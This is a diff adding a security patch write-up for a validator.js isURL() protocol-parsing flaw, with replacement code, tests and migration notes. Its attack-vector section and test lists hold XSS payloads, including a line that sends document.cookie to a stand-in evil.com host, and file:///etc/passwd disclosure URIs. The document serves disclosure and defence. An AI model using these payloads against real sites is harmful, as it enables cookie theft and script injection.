Fix CVE-2025-56200: Protocol parsing vulnerability in isURL()

CVE-2025-56200-PATCH.md

@@ -0,0 +1,340 @@
+# CVE-2025-56200 Security Patch for validator.js
+
+## Vulnerability Summary
+
+**CVE ID:** CVE-2025-56200 (GHSA-9965-vmph-33xx)
+**Severity:** Moderate (CVSS 6.1)
+**Component:** isURL() function
+**Affected File:** `/Users/laptopname/validator.js/src/lib/isURL.js`
+**Vulnerable Line:** Line 86
+
+### The Issue
+
+The `isURL()` function uses `'://'` as a delimiter to parse protocols, while web browsers use `':'` as the delimiter according to RFC 3986. This discrepancy allows attackers to bypass protocol validation, potentially leading to XSS and open redirect attacks.
+
+**Vulnerable Code (Line 86):**
+```javascript
+split = url.split('://');
+```
+
+**How It Fails:**
+- URL: `javascript:alert(1)`
+  - validator.js parsing: `split.length = 1` → No protocol detected (no `://`)
+  - Browser parsing: Protocol is `javascript:` → Executes JavaScript
+- URL: `data:text/html,<script>alert(1)</script>`
+  - validator.js parsing: No protocol detected → Treated as hostname
+  - Browser parsing: Protocol is `data:` → Renders HTML with XSS
+
+### Attack Vectors
+
+The vulnerability enables multiple attack vectors:
+
+1. **XSS via javascript: protocol:**
+   ```
+   javascript:alert(document.cookie)
+   javascript:fetch('https://evil.com?c='+document.cookie)
+   ```
+
+2. **XSS via data: URIs:**
+   ```
+   data:text/html,<script>alert(1)</script>
+   data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+   ```
+
+3. **Legacy XSS (IE):**
+   ```
+   vbscript:msgbox(1)
+   ```
+
+4. **File disclosure:**
+   ```
+   file:///etc/passwd
+   file:///c:/windows/system.ini
+   ```
+
+## The Fix
+
+### Code Changes
+
+Replace lines 78-100 in `/Users/laptopname/validator.js/src/lib/isURL.js` with the following:
+
+```javascript
+  let protocol, auth, host, hostname, port, port_str, split, ipv6;
+
+  split = url.split('#');
+  url = split.shift();
+
+  split = url.split('?');
+  url = split.shift();
+
+  // RFC 3986 compliant protocol parsing
+  // Protocol (scheme) is defined as: scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
+  // and is separated from the rest of the URI by a single colon ":"
+  const protocolMatch = url.match(/^([a-zA-Z][a-zA-Z0-9+.\-]*):(.*)$/);
+
+  if (protocolMatch) {
+    protocol = protocolMatch[1].toLowerCase();
+    const remainder = protocolMatch[2];
+
+    // Validate protocol against whitelist
+    if (options.require_valid_protocol && options.protocols.indexOf(protocol) === -1) {
+      return false;
+    }
+
+    // RFC 3986 defines authority-based URIs as having '//' after the colon
+    // Examples: http://host, ftp://host, file:///path
+    // Non-authority URIs don't have '//' after the protocol
+    // Examples: javascript:code, data:text/html, mailto:email, tel:number
+
+    if (remainder.startsWith('//')) {
+      // Authority-based URI - this is expected for http, https, ftp, etc.
+      url = remainder.substring(2);
+    } else {
+      // Non-authority URI detected (e.g., javascript:, data:, mailto:)
+      // These should be rejected for security unless explicitly allowed
+      // Even if a protocol like 'data' is in the allowed protocols list,
+      // it should still be rejected because data: URIs don't have a host to validate
+      return false;
+    }
+  } else if (options.require_protocol) {
+    return false;
+  } else if (url.slice(0, 2) === '//') {
+    if (!options.allow_protocol_relative_urls) {
+      return false;
+    }
+    url = url.slice(2);
+  }
+
+  if (url === '') {
+    return false;
+  }
+
+  split = url.split('/');
+  url = split.shift();
+```
+
+### Explanation of the Fix
+
+1. **RFC 3986 Compliance:** Uses `:` as the protocol delimiter, matching browser behavior
+   - Regex: `/^([a-zA-Z][a-zA-Z0-9+.\-]*):(.*)$/`
+   - Validates protocol format (starts with letter, followed by alphanumeric, `+`, `-`, or `.`)
+
+2. **Authority vs Non-Authority URIs:**
+   - Authority-based URIs (http://, https://, ftp://) have `//` after the colon
+   - Non-authority URIs (javascript:, data:, mailto:) do NOT have `//` after the colon
+   - The fix explicitly rejects non-authority URIs for security
+
+3. **Security-First Approach:**
+   - Even if `data` or `javascript` were added to the protocols list, they would still be rejected
+   - This prevents bypass attempts via configuration
+
+4. **Backward Compatibility:**
+   - All legitimate HTTP/HTTPS/FTP URLs continue to work
+   - Protocol-relative URLs (`//example.com`) still work with the appropriate option
+   - File URLs (`file:///path`) work when configured
+
+### Test Cases
+
+Add the following test cases to `/Users/laptopname/validator.js/test/validators.test.js`:
+
+```javascript
+  it('should reject dangerous protocol URIs (CVE-2025-56200)', () => {
+    test({
+      validator: 'isURL',
+      valid: [
+        // These should remain valid
+        'http://example.com',
+        'https://example.com',
+        'ftp://example.com',
+      ],
+      invalid: [
+        // XSS via javascript: protocol
+        'javascript:alert(1)',
+        'javascript:alert(document.cookie)',
+        'javascript:alert(\'XSS\')',
+        'javascript://example.com',
+        'javascript://example.com/%0aalert(1)',
+        'JavaScript:alert(1)', // case variation
+        'JAVASCRIPT:alert(1)',
+
+        // XSS via data: URIs
+        'data:text/html,<script>alert(1)</script>',
+        'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
+        'data:text/html,<h1>XSS</h1>',
+        'data:image/svg+xml,<svg onload=alert(1)>',
+        'data:application/x-javascript,alert(1)',
+
+        // Legacy IE XSS
+        'vbscript:msgbox(1)',
+        'VBScript:msgbox(1)',
+
+        // File disclosure
+        'file:///etc/passwd',
+        'file:///c:/windows/system.ini',
+        'file://localhost/etc/passwd',
+
+        // Other non-authority URIs that should be rejected
+        'mailto:test@example.com',
+        'tel:+1234567890',
+        'sms:+1234567890',
+        'about:blank',
+        'blob:https://example.com/uuid',
+      ],
+    });
+  });
+
+  it('should reject dangerous protocols even when require_valid_protocol is false (CVE-2025-56200)', () => {
+    test({
+      validator: 'isURL',
+      args: [{
+        require_valid_protocol: false,
+      }],
+      valid: [
+        'http://example.com',
+        'https://example.com',
+        'custom://example.com', // Custom authority-based protocol
+        'myapp://host/path',
+      ],
+      invalid: [
+        // These should STILL be invalid even with require_valid_protocol: false
+        // because they are non-authority URIs
+        'javascript:alert(1)',
+        'data:text/html,<script>alert(1)</script>',
+        'vbscript:msgbox(1)',
+        'mailto:test@example.com',
+      ],
+    });
+  });
+
+  it('should correctly parse protocols with RFC 3986 compliance (CVE-2025-56200)', () => {
+    test({
+      validator: 'isURL',
+      args: [{
+        protocols: ['http', 'https', 'ws', 'wss', 'custom'],
+        require_valid_protocol: true,
+      }],
+      valid: [
+        'http://example.com',
+        'https://example.com',
+        'ws://example.com',
+        'wss://example.com',
+        'custom://example.com',
+      ],
+      invalid: [
+        // Invalid because protocol not in whitelist
+        'ftp://example.com',
+        // Invalid because non-authority URI
+        'javascript:alert(1)',
+        'data:text/html',
+      ],
+    });
+  });
+
+  it('should handle edge cases in protocol parsing (CVE-2025-56200)', () => {
+    test({
+      validator: 'isURL',
+      args: [{
+        require_valid_protocol: false,
+      }],
+      valid: [
+        'http://example.com',
+        'h2://example.com', // Protocol with digit
+        'http+tls://example.com', // Protocol with +
+        'my-protocol://example.com', // Protocol with -
+        'my.protocol://example.com', // Protocol with .
+      ],
+      invalid: [
+        '123://example.com', // Protocol can't start with digit
+        '-protocol://example.com', // Protocol can't start with -
+        '.protocol://example.com', // Protocol can't start with .
+        'http_proto://example.com', // Protocol can't contain _
+        'ht tp://example.com', // Protocol can't contain space
+        ':://example.com', // Empty protocol
+        'http:/example.com', // Only one slash (malformed)
+        'http:example.com', // No slashes (non-authority, rejected)
+      ],
+    });
+  });
+```
+
+## Testing the Patch
+
+### Before the Patch
+
+These dangerous URLs would potentially pass validation:
+
+```javascript
+validator.isURL('javascript:alert(1)') // Would not detect protocol
+validator.isURL('data:text/html,<script>alert(1)</script>') // Would not detect protocol
+validator.isURL('vbscript:msgbox(1)') // Would not detect protocol
+```
+
+### After the Patch
+
+These dangerous URLs are correctly rejected:
+
+```javascript
+validator.isURL('javascript:alert(1)') // false - non-authority URI rejected
+validator.isURL('data:text/html,<script>alert(1)</script>') // false - non-authority URI rejected
+validator.isURL('vbscript:msgbox(1)') // false - non-authority URI rejected
+```
+
+### Legitimate URLs Still Work
+
+```javascript
+validator.isURL('http://example.com') // true
+validator.isURL('https://example.com') // true
+validator.isURL('ftp://example.com') // true
+validator.isURL('example.com') // true (no protocol required by default)
+```
+
+## Security Impact
+
+### Before Patch
+- Attackers could bypass protocol validation
+- XSS attacks possible via javascript:, data:, vbscript: protocols
+- Open redirect attacks possible
+- Protocol confusion attacks
+
+### After Patch
+- Protocol parsing matches browser behavior (RFC 3986 compliant)
+- Non-authority URIs (javascript:, data:, etc.) are explicitly rejected
+- Prevents XSS and protocol confusion attacks
+- Maintains backward compatibility for legitimate use cases
+
+## Migration Notes
+
+### Breaking Changes
+
+The following URLs will now be rejected (correctly, for security):
+
+1. **Non-authority URIs without explicit host:**
+   - `mailto:test@example.com` - Use a dedicated email validator instead
+   - `tel:+1234567890` - Use a dedicated phone validator instead
+   - `data:...` - Use the `isDataURI()` validator instead
+
+2. **Malformed URLs:**
+   - `http:example.com` (missing //)
+   - `http:/example.com` (only one /)
+
+### Recommended Actions
+
+1. **Review existing validation:** Check if your application accepts any non-authority URIs
+2. **Use specialized validators:** For email, phone, data URIs, use dedicated validators
+3. **Update tests:** Add test cases for the CVE scenarios
+4. **Security audit:** Review any places where validated URLs are used in href attributes or redirects
+
+## References
+
+- **CVE:** CVE-2025-56200
+- **GitHub Advisory:** GHSA-9965-vmph-33xx
+- **CVSS Score:** 6.1 (Moderate)
+- **RFC 3986:** URI Generic Syntax - https://datatracker.ietf.org/doc/html/rfc3986
+- **CWE-601:** URL Redirection to Untrusted Site ('Open Redirect')
+- **CWE-79:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
+
+## Credits
+
+- Vulnerability discovered and reported via GitHub Security Advisory
+- Patch developed following RFC 3986 standards
+- CVSS Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)